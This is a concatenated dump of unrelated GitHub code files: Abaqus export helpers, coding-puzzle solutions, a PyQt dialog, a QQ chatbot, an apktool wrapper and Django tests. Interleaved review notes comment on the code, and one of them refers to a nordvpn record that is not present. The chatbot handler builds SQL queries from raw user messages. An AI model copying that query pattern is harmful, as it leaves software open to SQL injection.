~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Function defs\n\ndef getNodalPEEQ(odbName, nodeSetName, verbose=True):\n \"\"\" Returns a CSV of the nodal averaged PEEQ \"\"\"\n \n dataName = 'PEEQ'\n nodalPEEQ = IntPtVariable(odbName, dataName, nodeSetName)\n nodalPEEQ.fetchNodalAverage()\n nodalPEEQ.saveCSV(verbose=verbose)\n return\n\ndef getNodalMises(odbName, nodeSetName, verbose=True):\n \"\"\" returns a CSV of the nodal averaged Mises \"\"\"\n \n dataName = 'MISES'\n nodalMISES = IntPtVariable(odbName, dataName, nodeSetName)\n nodalMISES.fetchNodalAverage()\n nodalMISES.saveCSV(verbose=verbose)\n return\n\ndef getNodalPressure(odbName, nodeSetName, verbose=True):\n \"\"\" returns a CSV of the nodal averaged pressure \"\"\"\n \n dataName = 'PRESS'\n nodalPRESS = IntPtVariable(odbName, dataName, nodeSetName)\n nodalPRESS.fetchNodalAverage()\n nodalPRESS.saveCSV(verbose=verbose)\n return\n \ndef getNodalInv3(odbName, nodeSetName, verbose=True):\n \"\"\" returns a CSV of the nodal averaged third invariant \"\"\"\n \n dataName = 'INV3'\n nodalINV3 = IntPtVariable(odbName, dataName, nodeSetName)\n nodalINV3.fetchNodalAverage()\n nodalINV3.saveCSV(verbose=verbose)\n return\n\ndef getNodalDispl(odbName, nodeSetName, verbose=True):\n \"\"\"\n returns several CSVs of the nodal coordinates\n (one CSV file per direction)\n \"\"\"\n dataName = 'U'\n nodalDispl = NodalVariable(odbName, dataName, nodeSetName)\n nodalDispl.fetchNodalOutput()\n nodalDispl.saveCSV(verbose=verbose)\n return\n\ndef getNodalReactionSum(odbName, nodeSetName, verbose=True):\n \"\"\"\n returns several CSVs of the summed 
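Note on the nordvpn setup.py record above: the console_scripts entry maps a nord command to nordvpn.__main__:main, so installing the package generates a nord executable that imports that module and calls main(). Purely as an illustration, since the actual module is not included in this record, a minimal __main__.py compatible with that hook might look like:

# Hypothetical nordvpn/__main__.py skeleton; the real implementation is not shown here.
import sys

def main(argv=None):
    argv = sys.argv[1:] if argv is None else argv
    # ... parse arguments and talk to the unofficial NordVPN API ...
    return 0

if __name__ == "__main__":
    sys.exit(main())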
nodal reactions\n (one CSV file per direction)\n \"\"\"\n dataName = 'RF'\n summedRF = NodalVariable(odbName, dataName, nodeSetName)\n summedRF.fetchNodalOutput()\n summedRF.sumNodalOutput()\n summedRF.saveCSV(verbose=verbose)\n return","repo_name":"ucdavis-kanvinde-group/abaqus-pso-calibration","sub_path":"Calibration/odbFetchFieldOutput.py","file_name":"odbFetchFieldOutput.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"73556372964","text":"\"\"\"\nGiven a linked list, swap every two adjacent nodes and return its head.\n\nExample 1:\n\nInput: head = [1,2,3,4]\nOutput: [2,1,4,3]\nExample 2:\n\nInput: head = []\nOutput: []\nExample 3:\n\nInput: head = [1]\nOutput: [1]\n \nConstraints:\n\n The number of nodes in the list is in the range [0, 100].\n 0 <= Node.val <= 100\n \nFollow up: Can you solve the problem without modifying the values in the list's nodes? (i.e., Only nodes themselves may be changed.)\n\"\"\"\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def swapPairs(self, head: ListNode) -> ListNode:\n\n p = head\n while p:\n val = p.val\n\n if p.next:\n p.val = p.next.val\n p.next.val = val\n p = p.next\n\n p = p.next\n\n return head\n\n\nclass Solution:\n def swapPairs(self, head: ListNode) -> ListNode:\n \n def recur(head): \n if not head or not head.next: \n return head \n\n\n p1 = head \n p2 = head.next \n \n p1.next = recur(p2.next)\n p2.next = p1 \n\n return p2 \n \n return recur(head)","repo_name":"chl218/leetcode","sub_path":"python/recurstion-i/swap_nodes_in_pairs.py","file_name":"swap_nodes_in_pairs.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70212618725","text":"import sys\r\nfrom collections import Counter\r\n\r\n\r\ndef main():\r\n N = int(input())\r\n survey = [int(input()) for _ in range(N)]\r\n survey = Counter(survey)\r\n if survey[0] > survey[1]:\r\n print('Junhee is not cute!')\r\n else:\r\n print('Junhee is cute!')\r\n\r\n\r\nif __name__ == '__main__':\r\n input = sys.stdin.readline\r\n main()\r\n","repo_name":"SeungWoo-You/PS","sub_path":"백준/Bronze/10886. 
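Note on the swap_nodes_in_pairs.py record above: the docstring poses the follow-up (swap nodes without modifying values), but the first Solution swaps val fields and only the recursive one relinks. An iterative relinking sketch using a dummy head, O(1) extra space and no value writes, built on the record's ListNode:

# Iterative pointer-relinking swapPairs (no value writes), using a dummy node.
def swap_pairs(head):
    dummy = ListNode(0, head)
    prev = dummy
    while prev.next and prev.next.next:
        first, second = prev.next, prev.next.next
        first.next = second.next   # detach first from second
        second.next = first        # second now precedes first
        prev.next = second         # splice the swapped pair back in
        prev = first               # first is now the tail of the swapped pair
    return dummy.next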
0 = not cute / 1 = cute/0 = not cute / 1 = cute.py","file_name":"0 = not cute / 1 = cute.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6784622448","text":"import sys\n\nfrom PyQt6.QtWidgets import QDialog, QDialogButtonBox, QLabel, QGridLayout, QComboBox, QSpinBox\n\nfrom PyQt6 import QtGui\n\n\nclass MultiGameDialogBox(QDialog):\n\n def __init__(self):\n\n super().__init__()\n\n self.player_a_agent = 1\n self.player_b_agent = 1\n self.player_a_simul_agent = 1\n self.player_b_simul_agent = 1\n self.number_of_games = 1\n\n self.setWindowTitle(\"Run Multiple Games\")\n\n QBtn = QDialogButtonBox.StandardButton.Ok | QDialogButtonBox.StandardButton.Cancel\n\n self.buttonBox = QDialogButtonBox(QBtn)\n self.buttonBox.accepted.connect(self.accept)\n self.buttonBox.rejected.connect(self.reject)\n\n layout = QGridLayout()\n\n self.player_a_dropdown = QComboBox(self)\n self.player_a_dropdown.addItems(['Random', 'Max', 'Minimax'])\n self.player_a_dropdown.activated.\\\n connect(lambda index=self.player_a_dropdown.currentIndex(): self.set_player_a_agent(index))\n\n self.player_b_dropdown = QComboBox(self)\n self.player_b_dropdown.addItems(['Random', 'Max', 'Minimax'])\n self.player_b_dropdown.activated.\\\n connect(lambda index=self.player_b_dropdown.currentIndex(): self.set_player_b_agent(index))\n\n self.player_a_simul_dropdown = QComboBox(self)\n self.player_a_simul_dropdown.addItems(['Random', 'R Learning', 'Q Learning', 'Preset'])\n self.player_a_simul_dropdown.activated. \\\n connect(lambda index=self.player_a_simul_dropdown.currentIndex(): self.set_player_a_simul_agent(index))\n\n self.player_b_simul_dropdown = QComboBox(self)\n self.player_b_simul_dropdown.addItems(['Random', 'R Learning', 'Q Learning', 'Preset'])\n self.player_b_simul_dropdown.activated. 
\\\n connect(lambda index=self.player_b_simul_dropdown.currentIndex(): self.set_player_b_simul_agent(index))\n\n self.game_count_spin_box = QSpinBox()\n self.game_count_spin_box.setMinimum(1)\n self.game_count_spin_box.setMaximum(9999)\n self.game_count_spin_box.setSuffix(\" rounds\")\n self.game_count_spin_box.setSingleStep(1)\n self.game_count_spin_box.valueChanged.connect(self.no_games_changed)\n\n layout.addWidget(QLabel(\"Set player A agent: \"), 0, 0)\n layout.addWidget(QLabel(\"Set player B agent: \"), 1, 0)\n layout.addWidget(QLabel(\"Set player A simul agent: \"), 2, 0)\n layout.addWidget(QLabel(\"Set player B simul agent: \"), 3, 0)\n layout.addWidget(QLabel(\"Number of Rounds: \"), 4, 0)\n layout.addWidget(self.player_a_dropdown, 0, 1)\n layout.addWidget(self.player_b_dropdown, 1, 1)\n layout.addWidget(self.player_a_simul_dropdown, 2, 1)\n layout.addWidget(self.player_b_simul_dropdown, 3, 1)\n layout.addWidget(self.game_count_spin_box, 4, 1)\n layout.addWidget(self.buttonBox, 5, 1)\n\n self.setLayout(layout)\n\n def no_games_changed(self, count):\n self.number_of_games = count\n\n def set_player_a_agent(self, i):\n self.player_a_agent = i + 1\n\n def set_player_b_agent(self, i):\n self.player_b_agent = i + 1\n\n def set_player_a_simul_agent(self, i):\n self.player_a_simul_agent = i + 1\n\n def set_player_b_simul_agent(self, i):\n self.player_b_simul_agent = i + 1\n\n def get_no_games(self):\n return self.number_of_games\n","repo_name":"hfynn5/FinalYearProject","sub_path":"Congkak/DialogueBoxes/MultiGameDialogBox.py","file_name":"MultiGameDialogBox.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"36908399146","text":"import threading\nimport time\nimport sqlite3\nimport jieba\njieba.set_dictionary(\"dict.txt\")\njieba.initialize()\n\nimport jieba.analyse\nimport logging\nimport global_vars\nimport message_send\n\nadmin_id = global_vars.get_var('admin_id')\nlog_level = global_vars.get_var('log_level')\nbotqq = global_vars.get_var('botqq')\ndatabase_url = global_vars.get_var('database_url')\n\nlogging.basicConfig(level=log_level, format='[Star] %(asctime)s - %(levelname)s - %(message)s')\nlog = logging.getLogger(__name__)\n\n\n\n\ndef dict_factory(cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\n\n\ndb = sqlite3.connect(database_url)\ndb.row_factory = dict_factory\ncur = db.cursor()\n\n\nclass MyThread(threading.Thread):\n def __init__(self, func, args):\n threading.Thread.__init__(self)\n self.func = func\n self.args = args\n self.result = self.func(*self.args)\n\n def get_result(self):\n try:\n return self.result\n except Exception as e:\n log.error(e)\n\n\ndef select(message):\n # execute方式执行查询语句\n db_s = f'select * from q_and_a where quz = \\'{message}\\' or id = \\'{message}\\''\n cur.execute(db_s)\n results = cur.fetchone()\n # print(db_s)\n if results:\n log.info('全字匹配到结果')\n return results\n else:\n log.info('全字匹配为空')\n return False\n\n\ndef like_select(message):\n # execute方式执行查询语句\n cur.execute(f'select * from q_and_a where quz like \\'%{message}%\\'')\n results = cur.fetchone()\n if results:\n log.info('模糊匹配到结果')\n return results\n else:\n log.info('模糊匹配为空')\n return False\n\n\ndef keyword_like_select(message):\n keywords = jieba.analyse.extract_tags(message, topK=5, allowPOS=('n', 'v'))\n if len(keywords) < 2:\n log.info('关键字不足')\n return False\n else:\n dbselect = f'select * from q_and_a where quz like 
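Note on the MultiGameDialogBox record above: the connections like lambda index=self.player_a_dropdown.currentIndex(): ... evaluate currentIndex() once, at connection time, so every activation reports the initial index (0) regardless of what the user picks. Since QComboBox.activated already emits the chosen row as an int in PyQt6, the handlers can be connected directly; a sketch:

# The activated signal passes the selected index itself, so no lambda is needed:
self.player_a_dropdown.activated.connect(self.set_player_a_agent)
self.player_b_dropdown.activated.connect(self.set_player_b_agent)
self.player_a_simul_dropdown.activated.connect(self.set_player_a_simul_agent)
self.player_b_simul_dropdown.activated.connect(self.set_player_b_simul_agent)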
\\'%{keywords.pop()}%\\' '\n for word in keywords:\n dbselect += f'and quz like\\'%{word}%\\' '\n cur.execute(dbselect)\n results = cur.fetchall()\n # print(dbselect)\n if results:\n log.info('关键字匹配到结果')\n return results\n else:\n log.info('关键字匹配为空')\n return False\n\n\ndef learn(quz, ans, ws):\n # execute方式执行语句\n cur.execute(f'insert into q_and_a(quz,ans) values(\\'{quz}\\',\\'{ans}\\')')\n db.commit()\n message_send.send_message(quz+'\\n'+ans, admin_id, None, None, ws, 'private', i=1)\n\n\ndef main_at(message, ws):\n ths = []\n result = []\n # 切除前部at机器人的CQ码\n str = list(message['raw_message'])\n str = ''.join(str)\n length = 12 + len(botqq)\n sliced_message = str.replace(message['raw_message'][0:length + 0:1], '')\n\n select_ways = [select, like_select, keyword_like_select]\n\n for i in select_ways:\n print(sliced_message)\n x = MyThread(i, args=(sliced_message,))\n ths.append(x)\n '''while length < len(ths):\n ths[-1].start()\n print('started ', ths[-1])\n length += 1\n for t in ths:\n t.join()'''\n for t in ths:\n result.append(t.get_result())\n if message['message_type'] == 'group':\n if result[0]:\n log.info('全字匹配回复')\n message_send.send_message(result[0]['ans'], message['group_id'], message['sender']['user_id'],\n message['message_id'], ws, 'group', i=1)\n elif result[1]:\n log.info('模糊匹配回复')\n message_send.send_message(result[1][0]['quz'], message['group_id'], message['sender']['user_id'],\n message['message_id'], ws, 'group', i=2)\n time.sleep(0.5)\n message_send.send_message(result[1][0]['ans'], message['group_id'], message['sender']['user_id'],\n message['message_id'], ws, 'group', i=1)\n elif result[2]:\n log.info('关键字匹配回复')\n quz = []\n i = 0\n while i < len(result[2]):\n quz.append(result[2][i]['quz'])\n i += 1\n message_send.send_message(quz, message['group_id'], message['sender']['user_id'],\n message['message_id'], ws, 'group', i=2)\n else:\n return False\n\n\ndef main(message, ws):\n ths = []\n result = []\n\n select_ways = [select, like_select, keyword_like_select]\n\n for i in select_ways:\n x = MyThread(i, args=(message['raw_message'],))\n ths.append(x)\n '''while length < len(ths):\n ths[-1].start()\n print('started ', ths[-1])\n length += 1\n for t in ths:\n t.join()'''\n for t in ths:\n result.append(t.get_result())\n if message['message_type'] == 'group':\n if result[0]:\n log.info('全字匹配回复')\n message_send.send_message(result[0]['ans'], message['group_id'], message['sender']['user_id'],\n message['message_id'], ws, 'group', 1)\n elif result[1]:\n log.info('模糊匹配回复')\n message_send.send_message(result[1]['ans'], message['group_id'], message['sender']['user_id'],\n message['message_id'], ws, 'group', 1)\n elif result[2]:\n log.info('关键字匹配回复')\n quz = []\n i = 0\n while i < len(result[2]):\n quz.append(result[2][i]['quz'])\n i += 1\n message_send.send_message(quz, message['group_id'], message['sender']['user_id'],\n message['message_id'], ws, 'group', 2)\n else:\n return False\n elif message['message_type'] == 'private':\n if result[0]:\n log.info('全字匹配回复')\n message_send.send_message(result[0]['ans'], message['user_id'], message['sender']['user_id'],\n message['message_id'], ws, 'private', 1)\n elif result[1]:\n log.info('模糊匹配回复')\n message_send.send_message(result[1]['ans'], message['user_id'], message['sender']['user_id'],\n message['message_id'], ws, 'private', 1)\n elif result[2]:\n log.info('关键字匹配回复')\n quz = []\n i = 0\n while i < len(result[2]):\n quz.append(result[2][i]['quz'])\n i += 1\n message_send.send_message(quz, message['user_id'], 
message['sender']['user_id'],\n message['message_id'], ws, 'private', 2)\n else:\n return False\n\n\ndef setu_(message, ws):\n t = '色狗!kimo!'\n if message['message_type'] == 'group':\n message_send.send_message(t, message['group_id'], message['sender']['user_id'],\n message['message_id'], ws, 'group', 91)\n elif message['message_type'] == 'private':\n message_send.send_message(t, message['user_id'], message['sender']['user_id'],\n message['message_id'], ws, 'private', 91)\n else:\n return False\n","repo_name":"rainsmen/Starbot","sub_path":"message_handle.py","file_name":"message_handle.py","file_ext":"py","file_size_in_byte":7345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1810503186","text":"#!/usr/bin/env python\n# -*- coding=utf-8 -*-\nimport subprocess\n\nimport core.controllers.plugin_category as plugin_category\nfrom core.controllers.const import *\nfrom core.controllers.utils import *\nfrom settings import *\n\n\nclass Apktool(plugin_category.Unpacker):\n def __init__(self):\n plugin_category.Unpacker.__init__(self)\n url = \"https://github.com/iBotPeaches/Apktool/releases/download/v2.3.1/apktool_2.3.1.jar\"\n name = \"apktool.jar\"\n self.bin_dir = os.path.join(os.path.split(os.path.realpath(__file__))[0], \"bin\")\n self.success, self.bin_path = download(url, self.bin_dir, name)\n\n def _ability(self):\n return {TYPE.SMALI: ABILITY.B,\n TYPE.ELF: ABILITY.B,\n TYPE.XML: ABILITY.B,\n TYPE.MANIFEST: ABILITY.B,\n }\n\n def start(self):\n if not self.success:\n logging.error(\"Apktool not exist.\")\n return\n command = \"java -jar {apktool_jar} d -f -o {output_path} {apk_path}\".format(\n apktool_jar=self.bin_path,\n apk_path=self.apk_path,\n output_path=self.plugin_task_path, )\n p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n for out_line in iter(p.stdout.readline, b''):\n logging.debug(out_line.replace('\\n', '').replace('\\r', ''))\n for err_line in iter(p.stderr.readline, b''):\n logging.debug(err_line.replace('\\n', '').replace('\\r', ''))\n p.stdout.close()\n p.stderr.close()\n p.wait()\n if p.returncode != 0:\n raise plugin_category.UnpackerException(\"Apktool Failed\")\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"Anemone95/ApkSec","sub_path":"plugins/unpacker/apktool/apktool.py","file_name":"apktool.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"7829630872","text":"def optimalCoinChange(x, denoms):\n # Function finds the minimum number of coins required to change a monetary\n # amount.\n # Inputs:\n # x = amount of money to be given in coins, given as an INTEGER, in cents.\n # e.g. 
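Note on the message_handle.py record above: the lookup helpers interpolate user-controlled message text straight into SQL f-strings, which both breaks on quote characters and is SQL-injectable. sqlite3 supports ? placeholders, including for LIKE patterns; a sketch of select and like_select rewritten that way, keeping the record's return convention:

# Parameterized versions of the record's lookup helpers (sqlite3 '?' placeholders).
def select(message):
    cur.execute("select * from q_and_a where quz = ? or id = ?", (message, message))
    return cur.fetchone() or False

def like_select(message):
    cur.execute("select * from q_and_a where quz like ?", ("%" + message + "%",))
    return cur.fetchone() or False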
$1.35 is input as 135\n # denoms = denominations of coins available, in INTEGER cents,\n # given as a ROW VECTOR.\n # Output:\n # numCoins = optimal number of coins used to find x\n # Aiden Burgess - abur970\n\n # Initialise initial coins for change to inf, except 0, which is the base case\n minCoinsNeeded = [float('inf') for i in range(x+1)]\n minCoinsNeeded[0] = 0\n\n # For each change value, iteratively calculate the minimum change required.\n for i in range(x):\n for coin in denoms:\n total = i+coin\n if total <= x:\n minCoinsNeeded[total] = min(\n minCoinsNeeded[total], minCoinsNeeded[i]+1)\n\n return minCoinsNeeded[x]\n","repo_name":"AidenBurgess/Uni-2021","sub_path":"ENGSCI 760/Assignments/3/coinChange.py","file_name":"coinChange.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44059387458","text":"import numpy as np\nfrom scipy import interpolate\n\nimport matplotlib.pyplot as plt\n\n\nctr =np.array( [(3 , 1), (2.5, 4), (0, 1), (-2.5, 4),\n (-3, 0), (-2.5, -4), (0, -1), (2.5, -4), (3, -1),])\nx=ctr[:,0]\ny=ctr[:,1]\n\n# uncomment both lines for a closed curve\n#x=np.append(x,[x[0]]) \n#y=np.append(y,[y[0]])\n\nl=len(x) \n\nt=np.linspace(0,1,l-2,endpoint=True)\nt=np.append([0,0,0],t)\nt=np.append(t,[1,1,1])\n\ntck=[t,[x,y],3]\nu3=np.linspace(0,1,(max(l*2,70)),endpoint=True)\nout = interpolate.splev(u3,tck)\n\nplt.plot(x,y,'k--',label='Control polygon',marker='o',markerfacecolor='red')\n#plt.plot(x,y,'ro',label='Control points only')\nplt.plot(out[0],out[1],'b',linewidth=2.0,label='B-spline curve')\nplt.legend(loc='best')\nplt.axis([min(x)-1, max(x)+1, min(y)-1, max(y)+1])\nplt.title('Cubic B-spline curve evaluation')\nplt.show()\n\n","repo_name":"kawache/Python-B-spline-examples","sub_path":"b-spline-evaluation.py","file_name":"b-spline-evaluation.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"52"} +{"seq_id":"6001910549","text":"from django_webtest import WebTest\nfrom hamcrest import assert_that, calling, contains_inanyorder, is_, raises\nfrom webtest.app import AppError\n\nfrom tests.helpers import Fake8Numbers as F8Ns\nfrom tests.helpers import GameFactory8AddNumbers as GF8As\n\n\ndef get_fields_games(numbers, add_numbers, game_id):\n return [\n {'name_game': 'test_lotto2',\n 'game_id': game_id,\n 'numbers': numbers,\n 'add_numbers': add_numbers\n }\n ]\n\n\ndef get_standart_game_obj(game_ids=[1, 2, 3, 4, 5]):\n GF8As(fields_games=get_fields_games(F8Ns.numbers_1, [1], game_ids[0]))\n GF8As(fields_games=get_fields_games(F8Ns.numbers_2, [2], game_ids[1]))\n GF8As(fields_games=get_fields_games(F8Ns.numbers_3, [3], game_ids[2]))\n GF8As(fields_games=get_fields_games(F8Ns.numbers_4, [4], game_ids[3]))\n GF8As(fields_games=get_fields_games(F8Ns.numbers_5, [4], game_ids[4]))\n\n\nclass ComparisonAllNumbersTest(WebTest):\n\n def _get_endpoint(self, game_id):\n return f'/test_lotto2/research_8_add/{game_id}/comparison_all_numbers/'\n\n def test_happy_path_comparison_all_numbers(self):\n get_standart_game_obj()\n\n resp = self.app.get(self._get_endpoint(5))\n assert_that(resp.json.keys(),\n contains_inanyorder('main_game', '1', '3', '2', '4'))\n assert_that(resp.json['main_game'], is_('5'))\n assert_that(resp.json['1'], is_([4, [2, 3, 5, 20]]))\n assert_that(resp.json['2'], is_([3, [4, 12, 13]]))\n assert_that(resp.json['3'], is_([3, [2, 5, 17]]))\n assert_that(resp.json['4'], is_([4, [2, 3, 
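Note on the coinChange.py record above: a quick usage check, using the docstring's own example. For US denominations, changing $1.35 takes six coins (five quarters and a dime); also note the function returns float('inf') when the amount is unreachable with the given denominations, which callers may want to map to a sentinel:

# Usage check for optimalCoinChange from the record.
coins = optimalCoinChange(135, [1, 5, 10, 25])
print(coins)  # 6  (five quarters + one dime)

missing = optimalCoinChange(3, [2])
print(missing)  # inf: 3 cents cannot be made from 2-cent coins alone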
13, 20]]))\n\n\nclass CombinationOptionsTest(WebTest):\n\n def _get_endpoint(self, game_id):\n return f'/test_lotto2/research_8_add/{game_id}/combination_options/'\n\n def test_happy_path_combination_options(self):\n get_standart_game_obj()\n params = {'how_games': 2}\n\n resp = self.app.get(self._get_endpoint(5), params=params)\n\n assert_that(list(resp.json.keys()),\n is_(['5', '4', '4, 2, 1, 1', '2, 1, 1, 1, 1, 1, 1']))\n assert_that(resp.json['5'], is_([4, 2, 1, 1]))\n assert_that(resp.json['4'], is_([2, 1, 1, 1, 1, 1, 1]))\n assert_that(resp.json['4, 2, 1, 1'], is_(1))\n assert_that(resp.json['2, 1, 1, 1, 1, 1, 1'], is_(1))\n\n\nclass InfoSequenceTest(WebTest):\n\n def _get_endpoint(self, game_id):\n return f'/test_lotto2/research_8_add/{game_id}/info_sequence/'\n\n def _standart_game_obj(self):\n get_standart_game_obj()\n get_standart_game_obj([6, 7, 8, 9, 10])\n get_standart_game_obj([13, 11, 14, 12, 15])\n\n def test_happy_path_info_sequence_without_only_len_sequence(self):\n self._standart_game_obj()\n params = {'how_games': 15,\n 'sequence': '14,15,16',\n 'only_len_sequence': 0}\n\n resp = self.app.get(self._get_endpoint(15), params=params)\n assert_that(resp.json,\n is_([{'11': '11', 'previous game_id': '15', 'difference': 4},\n {'7': '7', 'previous game_id': '11', 'difference': 4},\n {'2': '2', 'previous game_id': '7', 'difference': 5},\n {'min_difference': 4,\n 'middle_difference': 4.333333333333333,\n 'max_difference': 5,\n 'median': 4,\n 'amount_sequence': 3}]))\n\n def test_happy_path_info_sequence_with_only_len_sequence(self):\n self._standart_game_obj()\n params = {'how_games': 15,\n 'sequence': '14,15,16',\n 'only_len_sequence': 1\n }\n resp = self.app.get(self._get_endpoint(15), params=params)\n assert_that(resp.json, is_([{'amount_sequence': 0}]))\n\n params['sequence'] = '9,10,11'\n resp = self.app.get(self._get_endpoint(15), params=params)\n assert_that(resp.json,\n is_([{'13': '13', 'previous game_id': '15', 'difference': 2},\n {'6': '6', 'previous game_id': '13', 'difference': 7},\n {'1': '1', 'previous game_id': '6', 'difference': 5},\n {'min_difference': 2,\n 'middle_difference': 4.666666666666667,\n 'max_difference': 7,\n 'median': 5,\n 'amount_sequence': 3}]))\n\n def test_happy_path_info_sequence_how_info_games(self):\n self._standart_game_obj()\n params = {'how_games': 15,\n 'sequence': '14,15,16',\n 'how_info_games': 10}\n\n resp = self.app.get(self._get_endpoint(15), params=params)\n assert_that(resp.json,\n is_([{'11': '11', 'previous game_id': '15', 'difference': 4},\n {'7': '7', 'previous game_id': '11', 'difference': 4},\n {'min_difference': 4,\n 'middle_difference': 4,\n 'max_difference': 4,\n 'median': 4.0,\n 'amount_sequence': 2}]))\n\n def test_happy_path_validate_sequence(self):\n get_standart_game_obj()\n params = {'how_games': 5,\n 'sequence': '13,15'}\n assert_that(calling(self.app.get).with_args(self._get_endpoint(5), params=params),\n raises(AppError))\n\n\nclass AllSequencesInGamesTest(WebTest):\n def _get_endpoint(self, game_id):\n return f'/test_lotto2/research_8_add/{game_id}/all_sequences_in_games/'\n\n def _standart_game_obj(self):\n get_standart_game_obj()\n get_standart_game_obj([6, 7, 8, 9, 10])\n get_standart_game_obj([13, 11, 14, 12, 15])\n\n def test_happy_path_info_all_sequences_in_games_1(self):\n self._standart_game_obj()\n params = {'how_games': 15,\n 'part_consists_of': 1,\n 'how_info_games': 10}\n\n resp = self.app.get(self._get_endpoint(15), params=params)\n assert_that(resp.json,\n is_({'[1]': 2, '[2]': 8, '[3]': 6, '[4]': 
4, '[5]': 6, '[6]': 4,\n '[7]': 2, '[8]': 4, '[9]': 2, '[10]': 6, '[11]': 4, '[12]': 4,\n '[13]': 6, '[14]': 2, '[15]': 4, '[16]': 2, '[17]': 4,\n '[18]': 2, '[19]': 2, '[20]': 6}))\n\n def test_happy_path_info_all_sequences_in_games_3(self):\n self._standart_game_obj()\n params = {'how_games': 15,\n 'part_consists_of': 3,\n 'how_info_games': 10}\n\n resp = self.app.get(self._get_endpoint(15), params=params)\n assert_that(resp.json,\n is_({'[1, 2, 3]': 0, '[2, 3, 4]': 2, '[3, 4, 5]': 2, '[4, 5, 6]': 0,\n '[5, 6, 7]': 2, '[6, 7, 8]': 2, '[7, 8, 9]': 0, '[8, 9, 10]': 0,\n '[9, 10, 11]': 2, '[10, 11, 12]': 0, '[11, 12, 13]': 2,\n '[12, 13, 14]': 2, '[13, 14, 15]': 2, '[14, 15, 16]': 2,\n '[15, 16, 17]': 0, '[16, 17, 18]': 0, '[17, 18, 19]': 0,\n '[18, 19, 20]': 0}))\n\n\nclass ProbabilitySequencesTest(WebTest):\n def _get_endpoint(self, game_id):\n return f'/test_lotto2/research_8_add/{game_id}/probability_sequences/'\n\n def _standart_game_obj(self):\n get_standart_game_obj()\n get_standart_game_obj([6, 7, 8, 9, 10])\n get_standart_game_obj([13, 11, 14, 12, 15])\n\n def test_happy_path_info_all_sequences_in_games_1(self):\n self._standart_game_obj()\n params = {'how_games': 10,\n 'part_consists_of': 3,\n 'steps_back_games': 5,\n 'limit_overlap': 2,\n 'limit_amount_seq': 2,\n }\n\n resp = self.app.get(self._get_endpoint(15), params=params)\n assert_that(resp.json,\n is_({'12': {'ids': ['11', '10', '9', '8', '7'],\n 'exceeding_limit_overlap': {'[11, 12, 13]': 2,\n '[12, 13, 14]': 2,\n '[13, 14, 15]': 2,\n '[14, 15, 16]': 2},\n 'numbers_have': []},\n 'check_games': 10,\n 'exceeding_limit_overlap': 1,\n 'numbers_have': 0}))\n","repo_name":"FillGit/lotto","sub_path":"tests/test_app/view/research/test_research_8_add.py","file_name":"test_research_8_add.py","file_ext":"py","file_size_in_byte":8470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1264406194","text":"### Programme which makes a plot of runtime\n# with and without paralellization\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\n# input files\ninfile1 = open(\"./Results/cycles/timeO2.txt\")\ninfile2 = open(\"./Results/cycles/timeO3.txt\")\ninfile3 = open(\"./Results/cycles/timeOfast.txt\")\ninfile4 = open(\"./Results/cycles/timeunp.txt\")\n\n# loadtext to get matrices\ninput1 = np.loadtxt(infile1.readlines())\ninput2 = np.loadtxt(infile2.readlines())\ninput3 = np.loadtxt(infile3.readlines())\ninput4 = np.loadtxt(infile4.readlines())\n\n# transform to log scale with base 10\na1 = np.log10(input1[:,1])\na2 = np.log10(input1[:,0])\n\nb1 = np.log10(input2[:,1])\nb2 = np.log10(input2[:,0])\n\nc1 = np.log10(input3[:,1])\nc2 = np.log10(input3[:,0])\n\nd1 = np.log10(input4[:,1])\nd2 = np.log10(input4[:,0])\n\n# plot\nplt.plot(a1, a2, 'rx', label = \"-O2\")\nplt.plot(b1, b2, 'bx', label = \"-O3\")\nplt.plot(c1, c2, 'cx', label = \"-Ofast\")\nplt.plot(d1, d2, 'gx', label = \"Unparallellized w/out flags\")\n\nplt.xlabel('MC cycles $\\log_{10}$(N)')\nplt.ylabel('Time $\\log_{10}$(t)')\nplt.legend()\nplt.show()\n","repo_name":"Seedsiz/FYS4150-Project4","sub_path":"code-and-results/plottime.py","file_name":"plottime.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70982607845","text":"import servicemanager\nimport socket\nimport sys\nimport win32event\nimport win32service\nimport win32serviceutil\n\nimport threading\nimport logging\nimport os\nimport 
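Note on the plottime.py record above: it plots log10(time) against log10(N) for several compiler-flag runs, where the asymptotic growth order appears as the slope of each point cloud. A sketch that extracts that slope with a least-squares fit, assuming the same two-column files (column 0 = time, column 1 = cycle count, as in the record):

# Fit log10(t) ~ slope * log10(N) + c; the slope estimates the growth order.
import numpy as np

data = np.loadtxt("./Results/cycles/timeO2.txt")
logN = np.log10(data[:, 1])
logT = np.log10(data[:, 0])
slope, intercept = np.polyfit(logN, logT, 1)
print("estimated order: N^%.2f" % slope)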
